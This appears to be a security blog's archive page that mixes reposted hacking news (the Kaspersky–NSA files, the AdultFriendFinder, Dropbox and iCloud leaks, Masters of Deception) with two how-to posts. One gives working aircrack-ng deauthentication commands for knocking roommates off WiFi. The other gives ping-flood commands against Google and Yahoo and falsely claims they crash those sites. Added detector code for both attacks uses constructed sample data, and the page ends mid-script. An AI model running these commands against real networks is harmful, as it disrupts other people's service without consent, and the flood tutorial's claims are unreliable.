Showing posts with label hacking. Show all posts

Thursday, 16 November 2017

Kaspersky: Yes, we obtained NSA secrets. No, we didn’t help steal them

The classified source code, documents, and executable binaries were stored on a computer that used an IP address reserved for Verizon FIOS customers in Baltimore, about 20 miles from the NSA's Fort Meade, Maryland, headquarters, Kaspersky Lab said in an investigation report it published early Thursday morning. Starting on September 11, 2014 and running until November 9 of that year, Kaspersky Lab servers downloaded the confidential files multiple times after the company's antivirus software, which was installed on the machine, found they contained malicious code from Equation Group, an NSA-linked hacking group that operated for at least 14 years before Kaspersky exposed it in 2015.

The downloads—which, like other AV software, the Kaspersky program automatically initiated when it encountered suspicious software that warranted further inspection—included a 45MB 7-Zip archive that contained source code, malicious executables, and four documents bearing US government classification markings. A company analyst who manually reviewed the archive quickly determined it contained confidential material. Within a few days and at the direction of CEO and founder Eugene Kaspersky, the company deleted all materials except for the malicious binaries. The company then created a special software tweak to prevent the 7-Zip file from being downloaded again.

"The reason we deleted those files and will delete similar ones in the future is two-fold," Kaspersky Lab officials wrote in Thursday's report. "We don’t need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."

Pushing back

The report is Kaspersky's latest attempt to refute anonymous allegations, reported last month by The Wall Street Journal, The New York Times, and The Washington Post, that hackers working for the Russian government used Kaspersky AV to locate or steal confidential NSA material stored on a worker's home computer. The initial WSJ report said the AV program somehow alerted the hackers to the presence of the improperly stored files, but the paper said it wasn't clear how the program detected the material or whether company employees alerted the Russian government of those files.

Five days later, the NYT and WaPo said the Russian hackers were caught in the act of abusing the Kaspersky AV by Israeli spies, who happened to be burrowed deep inside Kaspersky's network at the time the confidential NSA files were stolen (Kaspersky Lab disclosed the breach in 2015). A day later, the WSJ went on to report that the role AV played in the hack required changes to the way the program worked and that those modifications likely came with the knowledge of Kaspersky officials.

The allegations, all attributed to unnamed officials with no supporting documentation, helped explain why the US Department of Homeland Security in September took the unprecedented step of directing all US agencies to stop using Kaspersky products and services. A month earlier, according to Cyber Scoop, members of the FBI quietly briefed US companies in the private sector on the threat US officials believed Kaspersky posed to national security. Within weeks of the briefings, retailer Best Buy stopped selling Kaspersky software and offered free removals and credits toward competing packages.

Thursday's report is Kaspersky Lab's attempt to fight accusations that could significantly reduce the revenue it generates in the US and potentially US allies. The report expands on preliminary findings it published three weeks ago that challenge the NSA narrative that its highly privileged access to millions of PCs throughout the world helps the Russian government obtain confidential materials from its adversaries.

Smoke Loader backdoor

Thursday's 13-page report provided more details about a malicious backdoor that infected the Kaspersky customer's computer when it installed a pirated version of Microsoft Office. The report said that Kaspersky AV first detected the trojan, known as Smoke Loader and Smoke Bot, on October 4 at 11:38pm EDT. That was 22 days after the AV program first detected the Equation Group files and 15 days after Kaspersky had downloaded the 7-Zip file. For it to have been installed, a user would have had to temporarily disable the AV program. Kaspersky Lab officials suspect the user turned off protection when it blocked attempts to install the pirated version of Office and, once it was installed, turned the AV back on.

Smoke Loader came to the attention of security researchers in 2011, when a Russian hacker advertised the Trojan for sale in an underground forum. During the time it infected the computer storing the NSA material, it relied on a command and control domain that was registered to someone using the name Zhou Lou, an address in Hunan, China, and the e-mail address This analysis, which was published three months before Kaspersky Lab says the Baltimore PC was infected, reports Smoke Loader contained a range of malicious capabilities, including the ability for attackers to remotely control it. There may have been more malware besides Smoke Loader installed on the computer. During the same two-month span, Kaspersky AV provided 121 alerts for non-NSA software.

"The hygiene of this user on the Internet was not very good," Brian Bartholomew, a US-based principal security researcher at Kaspersky Lab, told Ars. "All that leads to the possibility that there was potentially someone else on that system at the time" the NSA materials were reported stolen. "We see no indications of that, but there is that possibility."

Kaspersky Lab has additional information about the backdoor here.

One of the few new pieces of information in the report is the revelation of a detection rule Kaspersky Lab added to its AV in 2015. To better detect a surveillance operation known as TeamSpy, the AV program started scanning files that embedded the word "secret" in their code. A malware analyst, the report said, added it because TeamSpy malware was designed to automatically collect certain files of interest to the attackers. Specifically, files of interest had both extensions such as .doc, .rtf, .xls, .mdb, and .pdf and words including "pass," "secret," and "saidumlo" (the Georgian translation for secret). The 2015 detection rule searched files for strings including:

The rule might explain reporting in the latter WSJ article that, citing unnamed officials, said Kaspersky AV "searched for terms as broad as 'top secret,' which may be written on classified government documents, as well as the classified code names of US government programs."

Plausible deniability

Like the preliminary findings Kaspersky published three weeks ago, Thursday's report isn't likely to change the minds of critics who say the company's ties to the Kremlin pose an unacceptable risk to US security.

"It's very, very believable," Dave Aitel, a former NSA analyst and long-time Kaspersky critic said of the information Kaspersky Lab has brought to light. "But my personal perspective is that it does not address whatever the [US government] has on Kaspersky."

Still, Kaspersky's version of events raises a variety of inconsistencies and questions in the narrative provided by the unnamed people cited in the October articles. For instance:

  • Is the computer Kaspersky described the same one that stored the NSA secrets that were stolen by Russian hackers? If it is, why did the news accounts say the data theft occurred in 2015?
  • If the PCs are the same, do US government investigators have any evidence it was infected by malware at the time it stored those materials? If yes, have investigators ruled out the possibility the infection played a role in the location or theft of the NSA materials?
  • How can US government investigators be sure Kaspersky AV was modified intentionally to help Russian spies locate the NSA material?

Representatives with the NSA declined to answer the questions and referred Ars to FBI officials. The FBI declined to comment as well.

In fairness to US officials, there are often valid national security reasons for not providing specific pieces of information when disclosing classified information to reporters. What's more, if Russian President Vladimir Putin were to order Kaspersky Lab to help steal NSA secrets, it's not at all clear the Moscow-based company would have a legal mechanism to challenge the demand. Such an order would almost certainly require absolute secrecy and the kinds of vigorous denials Kaspersky Lab is publishing now.

This leaves much of the security world in a geopolitical he-said/she-said duel that makes it hard to know which version of events to believe. This stalemate isn't likely to resolve itself until US officials provide more details.

"I think it's plausible that Kaspersky Lab has been used to obtain confidential material, but so far we've only seen accusations, largely from anonymous sources," Jake Williams, a malware expert at Rendition InfoSec who worked in the NSA's elite Tailored Access Operations hacking group until 2013, told Ars. "Credible evidence and/or on the record statements from the US government are needed before we attack a foreign company."

This article was first posted on ARSTECHNICA.COM

Thursday, 22 June 2017

How to kick someone out from WiFi using Kali Linux

Are you fed up with your annoying roommates or flatmates because they are using all the bandwidth of your WiFi connection?

Here is the solution for you to kick that annoying friend of yours off the WiFi without letting them know.


This process needs the aircrack-ng tool suite. If you are using a penetration testing Linux distro you don't have to install it; other users have to install this tool first.

First open a new terminal and type in ifconfig to find the name of your wireless card (in my case the name is wlan0).

Now take down your wireless card with this command:

ifconfig wlan0 down

Don't worry, at the end of this tutorial I will tell you how to get it back up.

Now we will scan for networks (we will get the network BSSID and channel).

Use this command to scan for networks:

aireplay-ng -9 wlan0

Now we will scan for connected devices on the network

airodump-ng -c 6 --bssid xx:xx:xx:xx:xx:xx -w psk wlan0

-c is for the channel that the network is broadcasting on.

--bssid is for the network mac address we just wrote down.

Now we just wait a few seconds; after some time the devices connected to the network will show up here with their MAC addresses.

Write down the MAC address of the device you want to kick off your network.

Now we will kick the device off our network.

To do that use this command:

aireplay-ng -0 15 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0

-0 means that we will send deAuth packets to the device.

15 is the number of deAuth packets (if you want to send deAuth packets continuously then replace 15 with 0).

-a sets the network's BSSID which we wrote down earlier.

-c sets the MAC address of the device that you would like to kick off the network.

Great! Now we are sending the deAuth packets! The device should now be disconnected from the network.

Now it's time to bring your wireless card back up. If your card is down you won't be able to connect to a WiFi network.

Type in:

ifconfig wlan0 up
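Seen from the defender's side, the burst of deauthentication frames the command above produces is easy to spot in a monitor-mode capture: one AP/client pair suddenly receives far more deauths than any network would send on its own. The following Python example is added here and is not from the original post; it decodes raw 802.11 headers and flags such a burst. The frames, the BSSID and client MACs, and the threshold of 5 deauths in 2 seconds are all constructed assumptions.

```python
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0          # 802.11 frame type 0 = management
DEAUTH_SUBTYPE = 12    # management subtype 12 = deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "02:00:00:00:aa:01"    # constructed BSSID for the sample capture
STA = "02:00:00:00:bb:02"   # constructed client MAC for the sample capture


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def parse_deauth(frame: bytes):
    """Return the fields of a deauth frame, or None for any other frame.

    Header: frame control (2), duration (2), addr1 (6), addr2 (6), addr3 (6),
    sequence control (2); the deauth body opens with a 2-byte LE reason code.
    """
    if len(frame) < 26:
        return None
    fc = frame[0]
    ftype = (fc >> 2) & 0x3      # bits 2-3 of the first frame-control byte
    subtype = (fc >> 4) & 0xF    # bits 4-7
    if ftype != MGMT_TYPE or subtype != DEAUTH_SUBTYPE:
        return None
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]
    return {
        "dst": mac_str(frame[4:10]),      # addr1: receiver
        "src": mac_str(frame[10:16]),     # addr2: transmitter
        "bssid": mac_str(frame[16:22]),   # addr3: BSSID
        "seq": seq_ctrl >> 4,             # upper 12 bits: sequence number
        "reason": struct.unpack_from("<H", frame, 24)[0],
    }


class DeauthFloodDetector:
    """Sliding-window count of deauth frames per (BSSID, client) pair."""

    def __init__(self, threshold: int = 5, window_s: float = 2.0):
        self.threshold = threshold
        self.window_s = window_s
        self.events = defaultdict(deque)   # (bssid, client) -> timestamps
        self.alerts = []
        self._alerted = set()

    def feed(self, ts: float, frame: bytes):
        d = parse_deauth(frame)
        if d is None:
            return None
        # Floods are sent in both directions (AP->client and client->AP),
        # so key on whichever address is not the BSSID.
        client = d["dst"] if d["src"] == d["bssid"] else d["src"]
        key = (d["bssid"], client)
        window = self.events[key]
        window.append(ts)
        while window and ts - window[0] > self.window_s:
            window.popleft()
        if len(window) >= self.threshold and key not in self._alerted:
            self._alerted.add(key)
            self.alerts.append({
                "bssid": d["bssid"], "client": client, "count": len(window),
                "reason": d["reason"],
                "broadcast": client == BROADCAST,  # a flood with no -c hits every client
            })
        return d


def build_frame(fc0: int, dst: str, src: str, bssid: str, seq: int, body: bytes) -> bytes:
    """Pack an 802.11 frame for the constructed sample capture (test data only)."""
    header = bytes([fc0, 0x00]) + b"\x3a\x01"   # frame control, duration
    header += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    header += struct.pack("<H", (seq & 0xFFF) << 4)
    return header + body


def sample_capture():
    """(timestamp, frame) pairs: normal traffic, then a 15-frame deauth burst."""
    frames = [
        (0.0, build_frame(0x80, BROADCAST, AP, AP, 100, b"\x00" * 12)),    # beacon
        (0.1, build_frame(0x08, STA, AP, AP, 101, b"\xaa\xaa\x03")),       # data frame
        (0.5, build_frame(0xC0, STA, AP, AP, 102, struct.pack("<H", 3))),  # lone deauth: STA leaving
    ]
    for i in range(15):   # mirrors the tutorial's "-0 15": 15 deauths inside 1.5 s
        dst, src = (STA, AP) if i % 2 == 0 else (AP, STA)
        frames.append((5.0 + i * 0.1, build_frame(0xC0, dst, src, AP, 0, struct.pack("<H", 7))))
    return frames


def analyze(capture, threshold: int = 5, window_s: float = 2.0):
    """Run the detector over a capture and return the alerts it raised."""
    det = DeauthFloodDetector(threshold, window_s)
    for ts, frame in capture:
        det.feed(ts, frame)
    return det.alerts
```

Running `analyze(sample_capture())` ignores the beacon, data frame and the single legitimate deauth, and raises one alert for the AP/client pair as soon as the fifth deauth of the burst arrives.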

Author- Arun Kumar (CEH)


Monday, 25 May 2015

Hacked: Security breached of member information of adult dating site AdultFriendFinder

An online dating site for adults seeking sexual trysts has been hacked, potentially compromising the personal information of some of its 64 million members, the company said on Friday. The site, part of Sunnyvale, California-based FriendFinder Networks Inc, said it had contacted law enforcement, including the FBI, and a private investigative team to review the incident.

"FriendFinder Networks Inc. recently became aware of a potential data security incident," the company said in a statement on Friday. "The security of our members' information remains our top priority and, upon learning of this incident, we took immediate action," it said.

So far, there is no evidence that members' financial information has been compromised, it added.

AdultFriendFinder bills itself as "the hottest dating, hookup and sex community." Members are asked a host of personal information, including marital or relationship status, sexual orientation and intimate interests.

The company did not describe the nature of the data breach, but said it had taken immediate steps to protect members' privacy by "temporarily disabling the username search function and masking usernames of any users we believe were affected by the security issue."

FriendFinder Networks said it has 600 million-plus members on more than 40,000 sites.

Source Reuters

Wednesday, 15 April 2015

Government watchdog says that in-flight WiFi could allow hackers to hijack planes

In a report released earlier this week, U.S. government watchdog group GAO (Government Accountability Office) warned that the increasing connectivity of our aircraft, from flight tracking technologies to in-flight WiFi, could give hackers an access point to tap in and potentially hijack a flight.

“New networking technologies connecting FAA’s ATC information systems expose these systems to new cybersecurity risks, potentially increasing opportunities for systems to be compromised and damaged,” says the GAO.

“Such damage could stem both from attackers seeking to gain access to and move among information systems, and from trusted users of the systems, such as controllers or pilots, who might inadvertently cause harm.”

Speaking with FAA officials and experts, the GAO discovered that older, legacy systems are actually more difficult to access remotely than many modern systems, as the old systems do not connect directly to the FAA over the Internet. On the other hand, the NextGen systems will interoperate with one another, which means that if one system is compromised, others will be at risk as well.

The GAO says that although the FAA is “taking steps” to improve cybersecurity, there is more that can be done to protect our airlines from cyber threats.

“While FAA is working to transform the organization of its cybersecurity efforts,” says the GAO, “the experts we consulted said that it could improve upon those efforts by including all key stakeholders in its agency-wide approach. All 15 of our cybersecurity and aviation experts agreed that organizational clarity regarding roles, responsibilities, and accountability is key to ensuring cybersecurity across the organization.”


Thursday, 12 February 2015

CyberCrime: Masters of Deception: the gang that really were the kings and ruled cyberspace, but were finally prosecuted!

The original Masters of Deception included: Mark Abene ("Phiber Optik"), Paul Stira ("Scorpion"), Eli Ladopoulos ("Acid Phreak"), HAC, John Lee ("Corrupt") and Julio Fernandez ("Outlaw").

Additional members whose real names are unknown include: Supernigger (also of DPAK), Wing, Nynex Phreak, Billy_The_Kid, Crazy Eddie, The Plague, ZOD, Seeker, Red Knight (who was also a member of Cult of the Dead Cow), Lord Micro, n00gie and peaboy (a.k.a. MCI Sprinter).

Masters of Deception (MOD) was a New York-based group of hackers, most widely known in media for their exploits of telephone company infrastructure and later prosecution, as well as being the subject of the book Masters of Deception: The Gang That Ruled Cyberspace by Josh Quittner.


Masters of Deception operated differently in many respects to previous hacking groups. Although they openly shared information with each other, they took a controversial view on sharing information outside the group. It was believed that access to MOD's knowledge should be earned via degrees of initiation and a proven respect for the craft, rather than releasing powerful information into the wild where it could be used for nefarious purposes. A demonstration of responsibility on the part of the initiate was required. This informal compartmentalized protection of more sensitive knowledge was a structure originally employed by LOD in the 1980s, rather successfully. According to Lex Luthor, "I realized early on that only certain people can be trusted with certain information, and certain types of information can be trusted to no one. Giving out useful things to irresponsible people would inevitably lead to whatever thing it was being abused and no longer useful. I was very possessive of my information and frequently withheld things from my articles."—Phrack #40 interview, 1/8/1992.

Their Story + Origin

MOD's initial membership grew from meetings on Loop-Around Test Lines that led to legendary collaborations to hack RBOC phone switches and the various minicomputers and mainframes used to administer the telephone network. They successfully remained underground using alternative handles to hide even their true hacker identities.

Acid Phreak founded the Masters of Deception with Scorpion and HAC. The name itself was, among other things, a mockery of LOD, as 'M' is one letter up in the alphabet from 'L', although the name originally was a flexible acronym that could be used to identify membership in situations where anonymity would be the best course of action. It could stand for "Millions of Dollars" just as easily as "Masters of Deception."

It is claimed that the mockery of the LOD name was a statement to the underground that LOD had lost its direction. Several LOD members were close friends of MOD who had been raided and indicted by the government, causing the majority of those who remained to drop out of the underground for safety reasons. In their absence, LOD largely fell into disarray causing the disagreement and disillusionment that led Phiber Optik to align himself with MOD in an effort to restore the direction of the spirit of underground hacking.

The Fall of MOD

As a result of a major nationwide investigation by a joint FBI/Secret Service task force, five of MOD's members were indicted in 1992 in federal court. The case was prosecuted by the U.S. Attorney's Office for the Southern District of New York by Assistant U.S. Attorneys Stephen Fishbein and Geoffrey S. Berman.[1] Within the next six months (in 1993), all five pleaded guilty and were sentenced to either probation or prison. After the sentencing of Abene, 2600: The Hacker Quarterly, Winter 1993-94, had on its cover a rag doll labeled "BERMAN" stabbed by a dagger.

Source Wikipedia


Tuesday, 14 October 2014

Hacker Claims 7 Million Dropbox Accounts Compromised, Dropbox Denies

Dropbox is at the centre of a leak scandal, following the release of 400 usernames and passwords by an anonymous user on Pastebin.

The hacker claims the initial dump is just a portion of the 6,937,081 Dropbox accounts he claims to have compromised on Tuesday. He then requested Bitcoins in payment before he would allow access to more accounts.

In a statement to The Next Web Dropbox said the service had not been hacked and these passwords were expired.

    Dropbox has not been hacked. These usernames and passwords were unfortunately stolen from other services and used in attempts to log in to Dropbox accounts. We’d previously detected these attacks and the vast majority of the passwords posted have been expired for some time now. All other remaining passwords have been expired as well.

At the time of writing, when entering the leaked usernames and passwords into Dropbox, the service prompts the user to reset their password by sending an email to the registered address. Some reddit commenters claimed they could access the accounts shortly after the leaks, yet this has not been verified.

The latest attack follows the celebrity nude photo scandal in August, where dozens of A-List Hollywood stars had their iCloud accounts hacked and private photographs leaked online by an unidentified hacker.

To protect yourself from hackers getting to your personal information, it is advised you set up two-step verification on your Dropbox account, and all other accounts that have the option for that matter.

Source Mashable

Wednesday, 3 September 2014

The FBI Is Now Involved in Hunt for the Celebrity Nude Photo Hacker

Actress Mary Elizabeth Winstead, one of the celebrities whose photos were taken, at the Independent Spirit Awards on Feb. 23, 2013, in Santa Monica, California.

The FBI is looking into the iCloud celebrity photos hack, though it did not say whether it has opened an investigation.

Anonymous users began posting nude photos of actors and celebrities including Jennifer Lawrence, Kate Upton and Mary E. Winstead on the image-sharing websites AnonIB and 4Chan over the past week after the photos were allegedly stolen from the stars' iCloud accounts. As the images began to spread, an anonymous 4Chan user posted a list of dozens of other celebrities he or she claims to have photos and videos of. Some photos have been verified by the subjects, while the authenticity of others has been contested.

“The FBI is aware of the allegations concerning computer intrusions and the unlawful release of material involving high-profile individuals, and is addressing the matter," FBI public affairs officer Christopher Allen said in a statement provided to Mashable. "Any further comment would be inappropriate at this time.”

A representative from the Los Angeles Police Department told Mashable that it is "not investigating any hacking incidents."

Representatives for Jennifer Lawrence told Mashable they had gotten in touch with "authorities" soon after nude pictures of Lawrence began appearing online Sunday.

“This is a flagrant violation of privacy," a spokesperson for Lawrence said. "The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence.”

Apple also told Mashable that it is looking into the hack.

"We take user privacy very seriously and are actively investigating this report," Apple representatives said.

Mashable has also learned that Apple is working directly with celebrities and their publicists to investigate the breach.

Though the culprit or culprits remain unidentified, the allegedly enormous cache of nude celebrity photos likely comes from the work of several hackers who have been involved in a deep-web celebrity image-trading network that may have existed for years, according to Gawker.

A member of the network may have begun to leak the photos in recent weeks, which led to the images surfacing on more public websites on Sunday. Other leakers may have joined in once some images went public.

One AnonIB user, whom other users have dubbed the "original leaker," seemed to confirm that the stash of photos is the result of multiple hackers.

"Guys, I didn't do this by myself," he or she wrote. "There were several other people who were in on it and I needed to count on them to make this happen."

The user also claimed to be changing location to avoid authorities.

One 4Chan user, Bryan Hamade, was thought to be an original leaker after he asked for bitcoin donations from 4Chan users in exchange for more photos. He offered proof of more images by uploading a screenshot of his hard drive, but didn't scrub the name of his hard drive or the name of the hard drive network from that screenshot, allowing Reddit users to quickly dig up his identity.

Hamade, a server administrator for Southern Digital Media, adamantly denied that he was involved in the hacking in a response to questions by several media outlets. He said he was just trying to make out with some bitcoin donations, though Gawker reports that some photos have appeared on Hamade's posts and nowhere else, meaning he may be more than just a copycat.

Though no legal authority has confirmed opening a criminal case investigating the privacy breach, recent precedent shows that the hacker could face serious time behind bars.

Christopher Chaney was sentenced to 10 years in jail in 2012 after he was convicted of hacking into celebrity email accounts, stealing nude images of stars such as Scarlett Johansson and Mila Kunis, and posting those photos online.

Source Mashable

Tuesday, 26 August 2014

Attackers Who Downed PlayStation Servers for Hours Still Unknown

People are reflected on a wall of the Sony building at Ginza shopping district in Tokyo on May 14.

The culprits behind a distributed denial of service attack on PlayStation Network servers that spanned from Sunday to Monday are still unknown, though two different Twitter users have claimed responsibility.

One of those Twitter users also appeared to threaten an American Airlines flight on which Sony Online Entertainment President John Smedley was a passenger, forcing it to land in Phoenix, Arizona instead of San Diego, California to be scanned for explosives, though none were found and it's unclear whether the DDoS attack was related. Sony is the parent company of PlayStation.


The two Twitter accounts — @LizardSquad and @FamedGod — that claimed responsibility for downing PlayStation's online gaming servers have yet to be identified beyond their handles.

They've been labeled "hackers," and one has even been said to be a part of the Islamic State, the Islamist radicals that have taken over large swaths of territory in Iraq and Syria. Evidence for either of those claims, though, is scant.

A DDoS attack sends an extraordinary amount of traffic to a server, overwhelming it until it stops responding, but it is not a hack. The attacker does not have to break into anything, and no account information was reportedly stolen from PlayStation users.

And the only evidence for the claim that @LizardSquad is affiliated with the Islamic State is a series of the account's tweets, which were sent amidst other tweets that seem to dare the FBI to investigate.

@LizardSquad has also offered no evidence that the account is affiliated with the Islamic State, nor any evidence to take responsibility for bringing down PlayStation's servers.

The other account, @FamedGod, took credit for the attack with a video, which has since been taken down.

PlayStation issued a statement once the servers were back online to reassure users who thought the gaming system's networks had been hacked.

"We have seen no evidence of any intrusion to the network and no evidence of any unauthorized access to users’ personal information," the statement said.

The FBI is still trying to determine where the bomb threat was tweeted from, according to FBI Special Agent Perryn Collier, who works at the agency's Phoenix branch.

“What we have to do is figure out how this threat was transmitted, where it came from, who’s responsible," Collier said.

He said they weren't able to go into any more information while the investigation is ongoing.

Source Mashable

Sunday, 24 August 2014

More Than 1,000 Businesses Hit by Same Cyber Attack as Target

Shoppers arrive at a Target store in Los Angeles on Dec. 19, 2013.

Target wasn't the only business that experienced a cyber attack that compromised tens of millions of its customers' credit cards, according to the Secret Service.

More than 1,000 American businesses were hit by the same cyber attack that affected in-store cash registers at Target last year, The New York Times reported Friday.

According to a Department of Homeland Security advisory obtained by the New York Times, the attacks were "much more pervasive" than initially reported, with hackers gaining access to millions of payment card records that were then sold on the black market. Homeland Security officials encouraged all businesses, "regardless of size," to check for "Point of Sale malware infections," according to the report.

The data breach involves criminals scanning a company's system for vendors or employees who have remote access. Hackers run programs to guess username and password combinations to get inside those systems. Once in, they target the in-store cash register systems with malware known as "Backoff," comb through the systems and take payment card data.

In July, Homeland Security, the Secret Service, the National Cybersecurity and Communications Integration Center and their partners warned companies to check their in-store cash register systems for the Backoff malware. After the warning, only seven companies — including Supervalu and UPS — have opened up about their systems being affected, despite the Secret Service's much steeper estimates.

In the wake of Target's announcement about the Nov. 27 to Dec. 15 data breach, the company was heavily criticized after it waited almost a month before letting customers know that their personal information may have been compromised.

The Target attack is considered to be one of "the largest data breaches from any consumer business." It affected more than 70 million Target customers and h

Following the breach in May, Target Chief Executive Gregg Steinhafel was replaced by the company's former Chief Financial Officer John Mulligan. Target also hired a new chief information officer who previously worked at Homeland Security as a tech adviser a month prior to the leadership shuffle.

To confront the spread of the malware, the Secret Service and Homeland Security recommended that companies limit the number of vendors that have outside access to the corporate systems, and require more complex passwords and login lock outs after failing to sign in multiple times.

Additionally, they recommended revisions to a company's in-store cash register systems, including two-step verification and ways to better encrypt a customer's data.


Tuesday, 12 August 2014

How to crash a website?

First I will say this. Do not do this to anyone’s website or server except your own. This can get you prison time. This is for educational purposes. I will show you how to crash a website then I will show you how to prevent such attacks.
The most common way to crash a website is by sending mass amounts of data to the server that it is stored on. This means instead of simply crashing a single site you may crash multiple sites. It all depends on how many websites are stored on the server for the particular IP Address.
I wrote in previous blogs how to setup a server to host a website. I also wrote how to setup a server to host multiple websites. Both of the blogs show you how to setup server with a single IP address. I would recommend reading those blogs and setting up your own server so you can do the attack that I’m going to be doing on this blog.

Getting Started

First of all, no matter what computer you're using, and no matter what Operating System you have, you should already have the tools that you need to do this. These tools are listed below.
  • Ping
  • Any tool to find an IP Address of a website (Ping, Whois)
Now that you know the only two things that you will need, let's get started. I will first show you how to achieve this with Windows.
In Windows you will simply fire up the command prompt. There are several ways to do this, but I will simply tell you the most universal way of doing it for Windows: search for CMD or, in older versions of Windows, use the RUN program and type CMD.
This should open up your command prompt window. This window allows you to type DOS commands into it. So now we will need to get the IP address of a website. PING can do this, or even a whois website. So let's use ping to obtain the IP Address of, let's say, Google. To do this we will type the following into our command prompt.


After typing in the above command and pressing Enter, you should get the following result.

Pinging [] with 32 bytes of data:

Reply from bytes=32 time=56ms TTL=127
Reply from bytes=32 time=25ms TTL=127
Reply from bytes=32 time=27ms TTL=127
Reply from bytes=32 time=47ms TTL=127

Ping statistics for
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 25ms, Maximum = 56ms, Average = 38ms

Great, so now we know that Google’s IP address is But of course, who didn’t already know the IP address of Google anyway?
Now we will use Ping once again. However, this time we will ping the IP address, so we will type the following.

ping -t -l 65500

The above command will cause a continuing output of the following.

Pinging with 65500 bytes of data:

Request timed out.
Request timed out.

It will continue to do this until the site crashes.
So what exactly did we do?
Well Ping is a tool that sends packets of data from your computer to another computer. In our case the computer we are pinging is Google’s Server.
So just typing the word ping followed by pressing Enter into the Windows command line will output the following.

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] target_name

-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

What the above shows are the instructions for using Ping. We used the -t switch and the -l switch in our earlier command. As the above results show us, what we did was tell ping to keep sending data to a certain computer until the computer we are sending data to stops accepting it. That is why we used the -t switch. We also used the -l switch. By looking at our switch list we can see that the -l switch allows us to choose the size of the data packet we will send to a computer.
So in my example I used -l 65500. This is because that was the most I could use on my test machine. If you have more bandwidth you would use the biggest number you can.
In short, what we did was flood Google’s servers with so much data that they ended up crashing. Of course, we have to hope that the server we are attacking has less bandwidth than we do, or else we will end up crashing.
Now let's do the same thing on a Unix system.
To do this on a Unix system we will first need to use the -c switch. -c is the count switch. We use this because the default ping tool on Unix systems will keep pinging indefinitely if we don’t tell it when to stop. So we will type the following into the Terminal.

ping -c 4

The above will output the following.

PING ( 56(84) bytes of data.
64 bytes from ( icmp_req=1 ttl=48 time=231 ms
64 bytes from ( icmp_req=2 ttl=48 time=71.1 ms
64 bytes from ( icmp_req=3 ttl=49 time=60.7 ms
64 bytes from ( icmp_req=4 ttl=49 time=67.0 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 60.764/107.642/231.599/71.661 ms

So now we see that we sent 64 bytes of data to four times. We also see that the IP address of the Yahoo domain name is So we will now do the following.

ping -s 65500

The above will give an output until the target computer has shutdown. The output will look like the following.

PING ( 65500(65528) bytes of data.
65508 bytes from icmp_req=1 ttl=53 time=389 ms
65508 bytes from icmp_req=2 ttl=53 time=390 ms
65508 bytes from icmp_req=3 ttl=53 time=405 ms
65508 bytes from icmp_req=4 ttl=53 time=350 ms
65508 bytes from icmp_req=5 ttl=53 time=370 ms
65508 bytes from icmp_req=6 ttl=53 time=387 ms
65508 bytes from icmp_req=7 ttl=53 time=379 ms
65508 bytes from icmp_req=8 ttl=53 time=389 ms
65508 bytes from icmp_req=9 ttl=53 time=367 ms
65508 bytes from icmp_req=10 ttl=53 time=385 ms
65508 bytes from icmp_req=11 ttl=53 time=362 ms

Preventing The Attack

So how do we protect our servers from such an attack? Well, it’s extremely simple. However, for hobbyists who don’t have a lot of money and who are using someone's ISP to get internet access, it can be kind of pricey. What we need to do is give our servers more bandwidth than an average computer user would have. Either way, you’ll never have too much bandwidth. The more bandwidth you have, the faster your site will be on the web. Plus it gives you more of a cushion for attacks like the one I showed you in this blog. Getting more bandwidth is a common method that all major companies use to protect against such attacks. So in theory, if you have more bandwidth than your victim has, you will still be able to attack your victim.
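Bandwidth is only half of the defence: the flood described above is usually caught at the edge by rate-limiting ICMP echo requests per source. The following is an added example, not code from the original post, showing that detection logic run over a few constructed tcpdump-style log lines. It flags any source that exceeds a per-window packet or byte budget, which is exactly the pattern a ping flood with a 65500-byte payload produces. The log lines, the addresses (RFC 5737 documentation ranges), and the thresholds are all constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines in a simplified tcpdump style (not a real capture).
# 203.0.113.5 hammers the server with oversized echo requests; 192.0.2.7 is a
# normal host pinging once per second.
SAMPLE_LOG = """\
12:00:00.010 IP 203.0.113.5 > 198.51.100.10: ICMP echo request, id 1, seq 1, length 65508
12:00:00.020 IP 203.0.113.5 > 198.51.100.10: ICMP echo request, id 1, seq 2, length 65508
12:00:00.030 IP 203.0.113.5 > 198.51.100.10: ICMP echo request, id 1, seq 3, length 65508
12:00:00.040 IP 203.0.113.5 > 198.51.100.10: ICMP echo request, id 1, seq 4, length 65508
12:00:00.050 IP 203.0.113.5 > 198.51.100.10: ICMP echo request, id 1, seq 5, length 65508
12:00:00.060 IP 203.0.113.5 > 198.51.100.10: ICMP echo request, id 1, seq 6, length 65508
12:00:00.500 IP 192.0.2.7 > 198.51.100.10: ICMP echo request, id 9, seq 1, length 64
12:00:01.500 IP 192.0.2.7 > 198.51.100.10: ICMP echo request, id 9, seq 2, length 64
12:00:02.500 IP 192.0.2.7 > 198.51.100.10: ICMP echo request, id 9, seq 3, length 64
12:00:03.500 IP 192.0.2.7 > 198.51.100.10: ICMP echo request, id 9, seq 4, length 64
"""

# Only echo requests are interesting here; replies and other traffic are skipped.
LINE_RE = re.compile(
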